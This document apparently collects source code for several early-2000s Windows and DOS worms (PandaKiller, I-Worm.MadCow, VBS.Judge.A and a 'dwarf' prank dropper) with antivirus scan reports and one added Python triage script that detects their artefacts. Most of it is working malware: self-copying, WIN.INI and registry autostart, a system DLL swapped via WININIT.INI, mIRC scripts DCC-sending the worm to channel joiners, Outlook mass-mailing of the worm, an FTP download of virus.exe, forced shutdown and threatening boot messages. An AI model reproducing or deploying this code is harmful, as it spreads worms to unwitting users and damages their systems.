nul     db "NUL",00h
rename  db "Rename",00h
ini     db "C:\script.tpk",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE     db "Software\[PandaKiller]",00h
TITRE   db "Error Loader",00h
TEXTE   db "Windows NT required !",0dh,0ah
        db "This program will be terminated",00h

inid    db "[script]",0dh,0ah
        db "n0=on 1:start:{",0dh,0ah
        db "n1=.remote on",0dh,0ah
        db "n2=.ctcps on",0dh,0ah
        db "n3= .events on",0dh,0ah
        db "n4=}",0dh,0ah
        db "n5=on 1:join:#:{",0dh,0ah
        db "n6= if ( $nick == $me ) { halt } | .dcc "
        db "send $nick C:\Windows\WinExec.exe",0dh,0ah
        db "n7=}",0dh,0ah
initaille equ $-inid

SYSTIME struct
  wYear         WORD ?
  wMonth        WORD ?
  wDayOfWeek    WORD ?
  wDay          WORD ?
  wHour         WORD ?
  wMinute       WORD ?
  wsecond       WORD ?
  wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

.code
DEBUT:
        ; Checks whether a [PandaKiller] key exists under HKLM\Software.
        ; If it was not there (disposition = REG_CREATED_NEW_KEY = 1),
        ; install the components; otherwise skip straight to FICHIER.
        mov eax, offset CLE
        call REG
        cmp [regDisp],1
        jne FICHIER

WCOPIE:
        ; The program copies itself into the computer's WINDOWS folder
        ; under the name WinExec.exe.
        push 0
        call GetModuleHandleA
        push 260
        push offset szOrig
        push eax
        call GetModuleFileNameA
        push 260
        push offset szCopie
        call GetWindowsDirectoryA
        push offset Copie
        push offset szCopie
        call lstrcat
        push 0
        push offset szCopie
        push offset szOrig
        call CopyFileA

WIN_INI:
        ; An entry is written to WIN.INI so the program starts at every
        ; boot. This avoids the registry, which is too conspicuous.
        ; In WIN.INI in the WINDOWS folder:
        ;   [windows]
        ;   run="program name"
        push 260
        push offset szWin2
        call GetWindowsDirectoryA
        push offset Winini
        push offset szWin2
        call lstrcat
        push offset szWin2              ;lpFileName = %windir%\WIN.INI
        push offset szCopie             ;lpString   = %windir%\WinExec.exe
        push offset run                 ;lpKeyName  = run
        push offset windows             ;lpAppName  = windows
        call WritePrivateProfileStringA

WSOCK32:
        ; Here the SYSTEM directory's WSOCK32.DLL is copied to
        ; WSOCK32.TPK in the same SYSTEM directory.
        push 260
        push offset szWsk1
        call GetSystemDirectoryA
        push 260
        push offset szWsk2
        call GetSystemDirectoryA
        push offset Wsk1
        push offset szWsk1
        call lstrcat
        push offset Wsk2
        push offset szWsk2
        call lstrcat
        push 0
        push offset szWsk2
        push offset szWsk1
        call CopyFileA

WININIT:
        ; So that the computer uses the new file WSOCK32.TPK, the
        ; following is written to WININIT.INI in the WINDOWS directory
        ; (processed by the 9x loader before the shell starts):
        ;   [Rename]
        ;   NUL=%system%\WSOCK32.DLL
        ;   %system%\WSOCK32.DLL=%system%\WSOCK32.TPK
        push 260
        push offset szWin
        call GetWindowsDirectoryA
        push offset Wininit
        push offset szWin
        call lstrcat
        push offset szWin
        push offset szWsk1
        push offset nul
        push offset rename
        call WritePrivateProfileStringA
        push offset szWin
        push offset szWsk2
        push offset szWsk1
        push offset rename
        call WritePrivateProfileStringA
        jmp FICHIER

REG:
        push offset regDisp
        push offset regResu
        push 0
        push 0F003FH                    ;KEY_ALL_ACCESS
        push 0                          ;default security descriptor
        push 0
        push 0
        push eax                        ;address of the sub-key
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
SUITE:
        push [regResu]
        call RegCloseKey
        ret

FICHIER:
        ; One of the most practical ways to send the program everywhere
        ; is mIRC. With a script, mIRC automatically sends the program to
        ; everyone in the victim's CHANNEL. The script is written to C:\
        ; and then copied to C:\mirc, C:\mirc32, C:\program files\mirc
        ; and C:\program files\mirc32; the original is then deleted.
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset ini
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push initaille
        push offset inid
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

COPIE:
        push 00000000h
        push offset script1
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script2
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script3
        push offset ini
        call CopyFileA
        push 00000000h
        push offset script4
        push offset ini
        call CopyFileA
        push offset ini
        call DeleteFileA

ATTEND:
        push 60 * 1 * 1000              ;pause for 1 minute
        call Sleep

SOURIS:
        push 01h                        ;swap the mouse buttons
        call SwapMouseButton

HEURE2:
        push offset SystemTime          ;check the system date
        call GetSystemTime
        cmp [SystemTime.wYear],7D1h     ;if it is not 2001,
        jne ALERT                       ;jump to ALERT

ETEIND:
        push 01h                        ;otherwise shut the computer down
        call ExitWindowsEx              ;(EWX_SHUTDOWN; the original omits the dwReserved argument)

ALERT:
        push 10h                        ;MB_ICONERROR: display the fake error message
        push offset TITRE
        push offset TEXTE
        push 0
        call MessageBoxA

FIN:
        push 0                          ;end of program
        call ExitProcess

end DEBUT
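The persistence and spread tricks explained in the comments above (the WIN.INI [windows] run= autostart, the WININIT.INI [Rename] entries that delete or replace a system DLL before the shell loads, the script.ini handler that DCC-sends a file to every joining nick) and the FTP.BAT/FTP.DRV downloader from the PandaKiller.B description all leave plain-text indicators on disk. The Python triage script below is an added example, not code from this archive or its author: it parses constructed WIN.INI, WININIT.INI, script.ini and batch fixtures (invented text, not captures from a real host) and reports each indicator it finds.

```python
"""Host triage for the tricks the PandaKiller sources rely on: WIN.INI
[windows] run=/load= autostart, WININIT.INI [Rename] entries that delete or
replace system DLLs, mIRC script.ini handlers that DCC-send a file to every
joining nick, and batch launchers that drive ftp.exe with -s:<script>.
Added example, not code from the archive; all sample text is constructed."""
import re
from typing import Dict, List, Tuple

# Constructed fixtures shaped like the files the sources write (not real captures).
SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\WinExec.exe
[Desktop]
Wallpaper=(None)
"""
SAMPLE_WININIT_INI = """[Rename]
NUL=C:\\WINDOWS\\SYSTEM\\WSOCK32.DLL
C:\\WINDOWS\\SYSTEM\\WSOCK32.DLL=C:\\WINDOWS\\SYSTEM\\WSOCK32.TPK
"""
SAMPLE_SCRIPT_INI = """[script]
n0=on 1:start:{
n1=.remote on
n2=.ctcps on
n3= .events on
n4=}
n5=on 1:join:#:{
n6= if ( $nick == $me ) { halt } | .dcc send $nick C:\\Windows\\WinExec.exe
n7=}
"""
CLEAN_SCRIPT_INI = """[script]
n0=on 1:join:#:{ echo -a Welcome $nick }
"""
SAMPLE_BAT = "@echo off\r\nstart ftp -i -v -s:C:\\Win\\ftp.drv\r\n"


def parse_ini(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Order-preserving INI parser: {section (lower-cased): [(key, value), ...]}.
    Splits on the first '=' only, so mIRC lines containing '==' survive intact."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, []).append((key.strip(), value.strip()))
    return sections


def check_win_ini(text: str) -> List[str]:
    """[windows] run= and load= are executed by the 9x shell at every logon."""
    return [f"WIN.INI [windows] {k}= starts {v} at every logon"
            for k, v in parse_ini(text).get("windows", [])
            if k.lower() in ("run", "load") and v]


def check_wininit_ini(text: str) -> List[str]:
    """[Rename] is processed before the shell loads: dest=source, and NUL=file deletes."""
    findings = []
    for dest, src in parse_ini(text).get("rename", []):
        if dest.upper() == "NUL":
            findings.append(f"WININIT.INI deletes {src} at next boot")
        elif dest.lower().endswith(".dll"):
            findings.append(f"WININIT.INI replaces {dest} with {src} at next boot")
    return findings


MIRC_EVENT = re.compile(r"^on\s+\S+:(start|connect|join|text):", re.I)
DCC_SEND = re.compile(r"\.?dcc\s+send\s+\$nick\s+(\S+)", re.I)


def check_mirc_script(text: str) -> List[str]:
    """Flag any [script] handler that DCC-sends a path to $nick; remember which
    event the send sits under, since the send is usually on a later nN= line."""
    findings, handler = [], "unknown"
    for _, value in parse_ini(text).get("script", []):
        event = MIRC_EVENT.match(value)
        if event:
            handler = event.group(1).lower()
        sent = DCC_SEND.search(value)
        if sent:
            findings.append(f"script.ini {handler} handler DCC-sends {sent.group(1)} to $nick")
    return findings


FTP_SCRIPTED = re.compile(r"\bftp(?:\.exe)?\b[^\r\n]*?-s:(\S+)", re.I)


def check_batch(text: str) -> List[str]:
    """ftp -s:<file> replays an FTP command file non-interactively (the FTP.DRV trick)."""
    return [f"batch drives ftp.exe with command file {m.group(1)}"
            for m in FTP_SCRIPTED.finditer(text)]


def triage(win_ini: str, wininit_ini: str, script_ini: str, batch: str) -> List[str]:
    """Run every check and return the combined list of findings."""
    return (check_win_ini(win_ini) + check_wininit_ini(wininit_ini)
            + check_mirc_script(script_ini) + check_batch(batch))


if __name__ == "__main__":
    for line in triage(SAMPLE_WIN_INI, SAMPLE_WININIT_INI, SAMPLE_SCRIPT_INI, SAMPLE_BAT):
        print(line)
```

On a real host the same checks would be pointed at %windir%\WIN.INI, %windir%\WININIT.INI, every script.ini under the mIRC install directories and any .bat dropped next to them; the INI parser is deliberately tolerant because these files are hand-edited and rarely well formed.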

File W95PK.exe received on 05.16.2009 10:42:08 (CET)

Scanned by the same 40 engines, with the same versions and signature dates, as W32PKa.exe above.

Result (17 of the 40 engines reported a detection; the engine column for these results did not survive extraction):
HEUR/Malware, IRC/Generic.dropper, BehavesLike:Win32.IRC-Worm, W32.Ultratt.gz, BACKDOOR.Trojan, W32/P2PWorm, BehavesLike:Win32.IRC-Worm, IRC-Worm.DOS.Generic, New Malware.b, New Malware.b, Heuristic.Malware, probably unknown NewHeur_PE, W32/P2PWorm, IRC.Buffy.C, W95.Pet_Tick.gen, Possible_Virus, IRC.Buffy.C

Additional information
File size: 8192 bytes
MD5:  f7b2facb5e2c9e5870065004446a8867
SHA1: 837ce36b596ffab1af92ac1c63506fa613e16e6c

comment *
///// I-Worm.MadCow by PetiK /////

25/11/2000

To assemble:
tasm32 /M /ML madcow.asm
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib
*

jumps
locals
.386
.model flat,stdcall

;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:P‌ROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
regDisp   dd 0                          ;RegCreateKeyEx disposition
regResu   dd 0                          ;opened key handle (REG)
l         dd 0                          ;disposition (REG2)
p         dd 0                          ;opened key handle (REG2)
fh        dd 0
octets    dd ?
szOrig    db 260 dup (0)                ;path of the running executable
szOrig2   db 260 dup (0)
szCopie   db 260 dup (0)                ;%system%\Wininet32.exe
szCopi2   db 260 dup (0)                ;%windir%\MadCow.exe
szCico    db 260 dup (0)                ;%system%\MSLS.ICO
szWin     db 260 dup (0)                ;%windir%\WIN.INI
Dossier   db "C:\Win32",00h
fichier   db "C:\Win32\Salut.ico",00h
Copico    db "\MSLS.ICO",00h
Copie     db "\Wininet32.exe",00h
Copie2    db "\MadCow.exe",00h
BATFILE   db "C:\Win32\ENVOIE.BAT",00h
VBSFILE   db "C:\Win32\ENVOIE.VBS",00h
Winini    db "\\WIN.INI",00h
run       db "run",00h
windows   db "windows",00h
fileini   db "C:\Win32\script.ini",00h
Copie3    db "C:\Win32\MadCow.exe",00h
script1   db "C:\mirc\script.ini",00h
script2   db "C:\mirc32\script.ini",00h
script3   db "C:\program files\mirc\script.ini",00h
script4   db "C:\program files\mirc32\script.ini",00h
CLE       db "Software\[Atchoum]",00h
CLE2      db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"

vbsd:   db 'DEBUT()',0dh,0ah
        db 'Sub DEBUT()',0dh,0ah
        db 'EMAIL()',0dh,0ah
        db 'End Sub',0dh,0ah
        db '',0dh,0ah
        db 'Sub EMAIL()',0dh,0ah
        db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
        db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
        db 'For Each M In L.AddressLists',0dh,0ah
        db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
        db 'Set N = K.CreateItem(0)',0dh,0ah
        db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
        db 'Set P = M.AddressEntries(O)',0dh,0ah
        db 'If O = 1 Then',0dh,0ah
        db 'N.BCC = P.Address',0dh,0ah
        db 'Else',0dh,0ah
        db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
        db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
        db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
        db 'N.Send',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End Sub',0dh,0ah
vbstaille equ $-vbsd

batd:   db '@echo off',0dh,0ah
        db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd

inid:   db "[script]",0dh,0ah
        db "n0=on 1:JOIN:#:{",0dh,0ah
        db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
        db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
        db "n3=}",00h
initaille equ $-inid

include icone.inc                       ;defines icod / icotaille (not reproduced here)

.code
DEBUT:
VERIF:
        ; Checks whether an [Atchoum] key exists under HKLM\Software.
        ; If it is not there, install the components.
        mov eax,offset CLE
        call REG
        cmp [regDisp],1
        jne INIFILE

COPIE:
        ; Copies the original file into the SYSTEM folder under the name
        ; Wininet32.exe, then again into the WINDOWS folder as MadCow.exe.
        push 0
        call GetModuleHandleA
        push 260
        push offset szOrig
        push eax
        call GetModuleFileNameA
        push 260
        push offset szCopie
        call GetSystemDirectoryA
        push offset Copie
        push offset szCopie
        call lstrcat
        push 00h
        push offset szCopie
        push offset szOrig
        call CopyFileA
        push 260
        push offset szCopi2
        call GetWindowsDirectoryA
        push offset Copie2
        push offset szCopi2
        call lstrcat
        push 00h
        push offset szCopi2
        push offset szOrig
        call CopyFileA

WIN_INI:
        ; To launch the program, either the registry or the WIN.INI file in
        ; the WINDOWS folder can be used. The procedure is simple:
        ;   [windows]
        ;   run="program name"
        push 260
        push offset szWin
        call GetWindowsDirectoryA
        push offset Winini
        push offset szWin
        call lstrcat
        push offset szWin
        push offset szCopie
        push offset run
        push offset windows
        call WritePrivateProfileStringA

DIR:
        ; Creates C:\Win32.
        push 00h
        push offset Dossier
        call CreateDirectoryA

EMAIL:
        ; Creates C:\Win32\ENVOIE.VBS ...
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset VBSFILE
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push vbstaille
        push offset vbsd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle

EXEC:
        ; ... and C:\Win32\ENVOIE.BAT, which runs ENVOIE.VBS.
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset BATFILE
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push battaille
        push offset batd
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
        jmp EXECBAT

REG:
        push offset regDisp
        push offset regResu             ;receives the key handle
        push 0
        push 0F003Fh                    ;KEY_ALL_ACCESS
        push 0
        push 0
        push 0
        push eax                        ;Software\[Atchoum]
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push [regResu]
        call RegCloseKey
        ret

INIFILE:
        ; Creates the file script.ini in C:\Win32, read-only.
        push 00000000h
        push 00000001h                  ;FILE_ATTRIBUTE_READONLY
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset fileini
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push initaille
        push offset inid
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
        ; Copies this file to C:\mirc, C:\mirc32, C:\program files\mirc
        ; and C:\program files\mirc32.
        push 00h
        push offset script1
        push offset fileini
        call CopyFileA
        test eax,eax
        jnz COPYWIN
        push 00h
        push offset script2
        push offset fileini
        call CopyFileA
        test eax,eax
        jnz COPYWIN
        push 00h
        push offset script3
        push offset fileini
        call CopyFileA
        test eax,eax
        jnz COPYWIN
        push 00h
        push offset script4
        push offset fileini
        call CopyFileA
        test eax,eax
        jz ICOFILE

COPYWIN:
        ; If one of those copies succeeds, a copy of the program is
        ; created in C:\Win32 under the name MadCow.exe.
        push 0
        call GetModuleHandleA
        push 260
        push offset szOrig2
        push eax
        call GetModuleFileNameA
        push 00h
        push offset Copie3
        push offset szOrig2
        call CopyFileA
        jmp FIN

ICOFILE:
        ; Creates the file Salut.ico (C:\Win32\Salut.ico) ...
        push 00000000h
        push 00000080h
        push 00000002h
        push 00000000h
        push 00000001h
        push 40000000h
        push offset fichier
        call CreateFileA
        mov [fh],eax
        push 00h
        push offset octets
        push icotaille
        push offset icod
        push [fh]
        call WriteFile
        push [fh]
        call CloseHandle
        ; ... and moves it into the SYSTEM folder as MSLS.ICO.
        push 260
        push offset szCico
        call GetSystemDirectoryA
        push offset Copico
        push offset szCico
        call lstrcat
        push offset szCico
        push offset fichier
        call MoveFileA

REG2:
        ; Sets the default value of HKEY_CLASSES_ROOT\exefile\DefaultIcon
        ; to %system%\MSLS.ico, closes the registry, then ends the program.
        push offset l
        push offset p
        push 0
        push 1F0000h + 1 + 2h
        push 0
        push 0
        push 0
        push offset CLE2
        push 80000000h                  ;HKEY_CLASSES_ROOT
        call RegCreateKeyExA
        push 05h
        push offset szCico              ;%system%\MSLS.ico
        push 01h
        push 0
        push 00h                        ;DEFAULT VALUE
        push p
        call RegSetValueExA             ;CREATES THE VALUE
        push 0
        call RegCloseKey                ;CLOSES THE REGISTRY
        jmp FIN

EXECBAT:
        push 01h                        ;runs ENVOIE.BAT
        push offset BATFILE
        call WinExec

FIN:
        push 00h                        ;END OF PROGRAM
        call ExitProcess

end DEBUT

File MadCow.exe received on 05.16.2009 17:51:57 (CET)

Antivirus           Version          Last Update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.16
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.16
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.16
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.16
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.737         2009.05.16
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.16
PCTools             4.4.2.0          2009.05.16
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.16

Result (36 of the 40 engines reported a detection, listed in engine order; the engine column for these results did not survive extraction):
Email-Worm.Win32.Petik!IK, Win32/PetTick.worm.8192, Worm/Petik, Worm/Win32.Win32, W32/Petik.E, IRC:Generic-008, I-Worm/Petik, Generic.Malware.IM.5B177226, W32.Petik.A, Worm.Madcow, Worm.Win32.Petik.Z, Win32.Petik.8192, Win32/Petik.8192.B/C, W32/Petik.E, Email-Worm.Win32.Petik, W32/Petik.E@mm, Generic.Malware.IM.5B177226, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, Email-Worm.Win32.Petik, W32/PetTick@MM, W32/PetTick@MM, Worm.Petik, Worm:Win32/Petick@mm, Win32/Petik.Z, W32/Pet_Tick.8192.D, W32/Petik.A, VBS.LoveLetter, Worm.Mail.Petik.x, W32/Petik-A, Email-Worm.Win32.Petik, W95.Pet_Tick.gen, W32/PetTick@MM, WORM_PETIK.E, Win32.Worm.Petik.8192, VBS.LoveLetter

Additional information
File size: 8192 bytes
MD5:  15b037d0d23a915fb0a78961cdc7299a
SHA1: 85864e397e3fee261bdcb62b477a71e936db39f6

;By M.Xxxxxxx XXXXXXX (c)2000
;SIZE: 1034 BYTES
;DWARF4 SETS THE DATE TO 26 DECEMBER 1999
;C:\DWARF.VBS, WHICH ADDS A KEY TO THE REGISTRY
;C:\WINDOWS\DWARF.BAT, WHICH DISPLAYS A MESSAGE AT EVERY BOOT
;(the batch below is actually written as C:\WINDOWS\Panda.bat, while the
; VBS registers C:\WINDOWS\dwarf.bat under Run; the original has both names)
.model small
.code
org 100h

DATE:
        mov ah,2Bh                      ;DOS set system date
        mov dh,12
        mov dl,26
        mov cx,1999
        int 21h                         ;26 DECEMBER 1999
HEURE:
        mov ah,2Dh                      ;DOS set system time
        xor cx,cx
        xor dx,dx
        int 21h                         ;MIDNIGHT
FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                         ;create the 1st file
        xchg ax,bx
        mov ah,40h
        mov cx,progl1
        mov dx,offset prog1
        int 21h                         ;write
        mov ah,3Eh
        int 21h                         ;close
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                         ;create the 2nd file
        xchg ax,bx
        mov ah,40h
        mov cx,progl2
        mov dx,offset prog2
        int 21h                         ;write
        mov ah,3Eh
        int 21h                         ;close
MESSAGE:
        mov ax,3                        ;text mode 80x25, clears the screen
        int 10h
        mov ah,9
        lea dx,msg
        int 21h
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Panda.bat',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1  equ $-prog1
prog2   db '@echo off',0Dh,0Ah
        db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
        db 'cls',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
        db 'if errorlevel 1 goto Die',0Dh,0Ah
        db ':Die',0Dh,0Ah
        db 'cls',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo *** *** *** * *',0Dh,0Ah
        db 'echo * * * * * * ** **',0Dh,0Ah
        db 'echo * * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo *** *** *** * *',0Dh,0Ah
progl2  equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0        ;unused
msg     db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
        db 'IL SE NOMME C:\dwarf.vbs',10,10,13
        db 'OUVRE LE VITE $'

end DATE

'Name     : VBS.Judge.A
'Author   : PetiK
'Language : VBS
'Date     : 08/12/2000
'Copy itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs
'Add to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
'    WinGDI = %windir%\WinGDI.EXE.vbs
'Function EMAIL : Scan Address Contact and send a mail with copy.

'VBS.Judge.A by Petik (c)2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll

DEBUT()

Sub DEBUT()
  Set win = fso.GetSpecialFolder(0)
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(win&"\WinGDI.EXE.vbs")
  c.Copy("C:\Judge.TXT.vbs")
  ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
  EMAIL()
  'FTP()
  'AUTOEXEC()
  TXT()
End Sub

Sub EMAIL()
  If Not fso.FileExists("C:\Judge.txt") Then
    Set OApp = CreateObject("Outlook.Application")
    if oapp="Outlook" then
      Set Mapi = OApp.GetNameSpace("MAPI")
      For Each AddList In Mapi.AddressLists
        If AddList.AddressEntries.Count <> 0 Then
          For AddListCount = 1 To AddList.AddressEntries.Count
            Set AddListEntry = AddList.AddressEntries(AddListCount)
            Set msg = OApp.CreateItem(0)
            msg.To = AddListEntry.Address
            msg.Subject = "BatMan, SpiderMan et les autres"
            msg.Body = "La vraie histoire de ces justiciers"
            msg.Attachments.Add "C:\Judge.TXT.vbs"
            msg.DeleteAfterSubmit = True
            If msg.To <> "" Then
              msg.Send
            End If
          Next
        End If
      Next
    end if
  End If
End Sub

Sub FTP()
  If Not fso.FileExists("C:\Judge.txt") Then
    Set bat = fso.CreateTextFile(win&"\FTP.bat")
    bat.WriteLine "@echo off"
    bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
    bat.close
    Set drv = fso.CreateTextFile("C:\FTP.drv")
    drv.WriteLine "open"
    drv.WriteLine "members.aol.com"
    drv.WriteLine "pentasm99"
    drv.WriteLine "binary"
    drv.WriteLine "lcd C:\"
    drv.WriteLine "get virus.exe"
    drv.WriteLine "bye"
    drv.WriteLine "exit"
    drv.close
    ws.Run (win&"\FTP.bat")
  End If
End Sub

Sub AUTOEXEC()
  If Day(Now) = 1 then
    Set FileObj = CreateObject("Scripting.FileSystemObject")
    file = "c:\autoexec.bat"
    Set InStream = FileObj.OpenTextFile (file, 1, False, False)
    TLine = Instream.Readall
    Set autobat = FileObj.CreateTextFile (file, True, False)
    autobat.write(tline)
    autobat.WriteBlankLines(1)
    autobat.WriteLine "@echo off"
    autobat.WriteLine "cls"
    autobat.WriteLine "echo."
    autobat.WriteLine "echo."
    autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
    autobat.WriteLine "echo."
    autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
    autobat.WriteLine "pause"
  End If
End Sub

Sub TXT()
  Set ptk = fso.CreateTextFile("C:\Judge.txt")
  ptk.WriteLine "Si vous lisez ce texte,"
  ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
  ptk.Close
  Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
  mp3.Write vbs
  mp3.close
End Sub

File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)

Antivirus           Version          Last Update   Result
a-squared           4.0.0.101        2009.05.16    Email-Worm.Win32.Petik!IK
AhnLab-V3           5.0.0.2          2009.05.16    VBS/Anjulie
AntiVir             7.9.0.168        2009.05.15    Worm/Petik.AV.03
Antiy-AVL           2.0.3.1          2009.05.15    Worm/Win32.Win32
Authentium          5.1.2.4          2009.05.16    VBS/Petik.L@mm
Avast               4.8.1335.0       2009.05.15    VBS:MailWorm-gen
AVG                 8.5.0.336        2009.05.15    VBS/VBSWG
BitDefender         7.2              2009.05.16    Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal       10.00            2009.05.15    -
ClamAV              0.94.1           2009.05.16    Worm.VBS-14
Comodo              1157             2009.05.08    -
DrWeb               5.0.0.12182      2009.05.16    VBS.Petik
eSafe               7.0.17.0         2009.05.14    -
eTrust-Vet          31.6.6508        2009.05.16    VBS/Buggy
F-Prot              4.4.4.56         2009.05.16    VBS/Petik.L@mm
F-Secure            8.0.14470.0      2009.05.15    Email-Worm.Win32.Petik
Fortinet            3.117.0.0        2009.05.16    VBS/Judge.A
GData               19               2009.05.16    Generic.ScriptWorm.A9DC8F67
Ikarus              T3.1.1.49.0      2009.05.16    Email-Worm.Win32.Petik
K7AntiVirus         7.10.737         2009.05.16    -
Kaspersky           7.0.0.125        2009.05.16    Email-Worm.Win32.Petik
